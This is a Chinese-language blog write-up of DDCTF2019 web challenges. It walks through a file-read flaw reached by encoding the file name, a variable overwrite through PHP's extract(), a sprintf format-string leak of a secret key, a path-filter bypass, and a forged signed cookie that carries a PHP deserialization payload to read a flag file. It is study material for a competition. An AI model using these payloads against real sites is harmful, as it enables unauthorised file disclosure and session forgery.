DDCTF2019 web-writeup

作者: Jenny_Zhx | 来源:发表于2019-04-18 22:15 被阅读6次

    又是没有进入复赛的ctf
    继续留下没有技术的泪水
    希望下次再加油吧!


    没技术的掀桌子

    1 滴~

    2 web签到题

    3 Upload-IMG

    4 大吉大利今晚吃鸡

    5 Misc-wireshark


    1 滴~

    image.png

    察觉到jpg=TmpZMlF6WXhOamN5UlRaQk56QTJOdz09有问题
    发现加密形式是base64_encode(base64_encode(bin2hex($jpg))
    解密得到是flag.jpg
    以同样加密方式构造index.php


    image.png

    得到index.php源码
    base64解密之后:

    <?php
    /*
     * https://blog.csdn.net/FengBanLiuYun/article/details/80616607
     * Date: July 4,2018
     */
    error_reporting(E_ALL || ~E_NOTICE);
    
    
    header('content-type:text/html;charset=utf-8');
    if(! isset($_GET['jpg']))
        header('Refresh:0;url=./index.php?jpg=TmpZMlF6WXhOamN5UlRaQk56QTJOdz09');
    $file = hex2bin(base64_decode(base64_decode($_GET['jpg'])));
    echo '<title>'.$_GET['jpg'].'</title>';
    $file = preg_replace("/[^a-zA-Z0-9.]+/","", $file);
    echo $file.'</br>';
    $file = str_replace("config","!", $file);
    echo $file.'</br>';
    $txt = base64_encode(file_get_contents($file));
    
    echo "<img src='data:image/gif;base64,".$txt."'></img>";
    /*
     * Can you find the flag file?
     *
     */
    
    ?>
    

    发现注释中有一个url提示:https://blog.csdn.net/FengBanLiuYun/article/details/80616607
    这里有个比较坑的点.......这篇文章不是真正的hint
    我还看了很久......想着怎么绕过preg_replace
    还是太naive了

    这位老哥博客的访问量嗖嗖的增
    评论也是特别的有趣


    实在太坑 image.png
    看到注释还有 Can you find the flag file?
    猜测可能要找到的是一个文件
    翻这个博主的博客发现提到文件的一篇文章
    https://blog.csdn.net/FengBanLiuYun/article/details/80913909

    以上面的加密方式构造practice.txt.swp
    base64解密后得到:f1ag!ddctf.php

    根据 Can you find the flag file?猜测这是一个文件名
    从源码中可知config被过滤为!
    所以构造文件名为:f1agconfigddctf.php
    得到文件源码

    <?php
    include('config.php');
    $k = 'hello';
    extract($_GET);
    if(isset($uid))
    {
        $content=trim(file_get_contents($k));
        if($uid==$content)
        {
            echo $flag;
        }
        else
        {
            echo'hello';
        }
    }
    
    ?>
    

    需要构造uid变量和k文件内容一致
    这里是一个变量覆盖漏洞
    构造uid=&k= 即可得到flag

    其实这题有一部分应该是根据百度杯的一道CODE 50pt出的
    有兴趣可以看看


    2 web签到题

    提示没有权限访问
    查看源码 - 发现js/index.js

    beforeSend: function (XMLHttpRequest) {
                XMLHttpRequest.setRequestHeader("didictf_username", "");
     },
    

    bp抓包增加header头:didictf_username:admin



    访问/app/fL2XID2i0Cdh.php
    获得源码
    其中察觉get_key函数

    private function get_key() {
            //eancrykey  and flag under the folder
            $this->eancrykey =  file_get_contents('../config/key.txt');
        }
    

    要想获得eancrykey

    if(!empty($_POST["nickname"])) {
                $arr = array($_POST["nickname"],$this->eancrykey);
                $data = "Welcome my friend %s";
                foreach ($arr as $k => $v) {
                    $data = sprintf($data,$v);
                }
                parent::response($data,"Welcome");
            }
    

    代码审计可知需要设置cookie 步入session_read函数
    并且POST传入nickname参数

    可以发现如果POST方式传nickname='a'
    此时arr=['a',$this->eancrykey]
    循环中执行sprintf(data,'a')
    则data='welcome my friend a'
    再次执行sprintf则不会传入eancrykey参数

    若POST方式传nickname='%s'
    执行sprintf(data,'%s')
    则data='welcome my friend %s'
    再次执行sprintf则传eancrykey参数入格式符%s输出



    找到key之后还要去看如何利用
    看到这里有文件包含漏洞

    public function __destruct() {
        if(empty($this->path)) {
            exit();
        }else{
            $path = $this->sanitizepath($this->path);
            if(strlen($path) !== 18) {
                exit();
            }
            $this->response($data=file_get_contents($path),'Congratulations');
        }
        exit();
    }
    

    猜测敏感flag文件为:../config/flag.txt(长度正好为18)

    private function sanitizepath($path) {
        $path = trim($path);
        $path=str_replace('../','',$path);
        $path=str_replace('..\\','',$path);
        return $path;
    }
    

    path有过滤,构造...\\./config/flag.txt绕过

    要去找调用__destruct的地方
    __destruct构折函数在对象被销毁时被调用
    unserialize函数将会自动调用对象__wakeup和__destruct函数
    发现可利用函数

    var $cookie_name                = 'ddctf_id';
    $session = $_COOKIE[$this->cookie_name];
    if(!isset($session)) {
                parent::response("session not found",'error');
                return FALSE;
            }
            $hash = substr($session,strlen($session)-32);
            $session = substr($session,0,strlen($session)-32);
    
            if($hash !== md5($this->eancrykey.$session)) {
                parent::response("the cookie data not match",'error');
                return FALSE;
            }
            $session = unserialize($session);
    

    看到服务器端会检验cookie中ddctf_id参数中最后32位
    检验其是否等于md5(this->eancrykey.$session)
    this->eancrykey在上面已经获得
    开始构造session

    <?php
    class Session{
        var $path='....\\/config/flag.txt';
    }
    $k=new Session();
    echo serialize($k);
    echo md5('EzblrbNS'.serialize($k));
    ?>
    

    构造ddctf_id=O:7:"Session":1:{s:4:"path";s:21:"..../config/flag.txt";}4b5ba6958a9873f456c2928b64b0be4d


    image.png

    得到flag!

    未完待续

    相关文章

      网友评论

        本文标题:DDCTF2019 web-writeup

        本文链接:https://www.haomeiwen.com/subject/wcbxgqtx.html